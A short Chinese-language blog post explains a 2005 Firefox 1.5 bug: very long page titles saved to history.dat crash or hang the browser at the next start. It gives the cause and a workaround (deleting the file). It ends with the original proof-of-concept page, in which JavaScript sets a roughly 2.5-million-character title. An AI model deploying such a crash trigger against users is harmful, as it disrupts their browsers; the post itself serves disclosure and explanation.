demo@virushuo

from:http://packetstormsecurity.org/0512-exploits/firefox-1.5-buffer-overflow.txt

为避免这个问题被拿出来危言耸听，我先提前和大家介绍一下。

原因是这样的：

firefox会在history.dat这个文件中保存历史纪录)，当碰到一个超长的Title的时候，Firefox同样会把它保存于history.dat中。下次打开Firefox的时候，就会因为缓冲区溢出而崩溃。

解决方法是手工删除掉history.dat文件。

这个问题仅会导致打开浏览器的时候出错，暂时还没有发现其他危害。

ZIPLOCK 用Firefox 1.5和Windows XP SP2下发现的这个bug。
我在Freebsd 6,Firefox 1.5测试，没有崩溃，但是会另firefox变得非常慢，然后停止响应。

个人认为，不算太严重的bug，这个测试脚本把标题搞到了5000*500个字符，这也长的夸张了点。不知道IE碰到这么长的标题会如何？有兴趣不妨测试一下，我这里没有IE，不测了。

Mozilla应该会很快修正这个bug。

测试代码：

<html><head><title>heh</title><script type="text/javascript">
function ex() {
var buffer = "";
for (var i = 0; i < 5000; i++) {
buffer += "A";
}
var buffer2 = buffer;
for (i = 0; i < 500; i++) {
buffer2 += buffer;
}
document.title = buffer2;
}
</script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME
</a></body></html>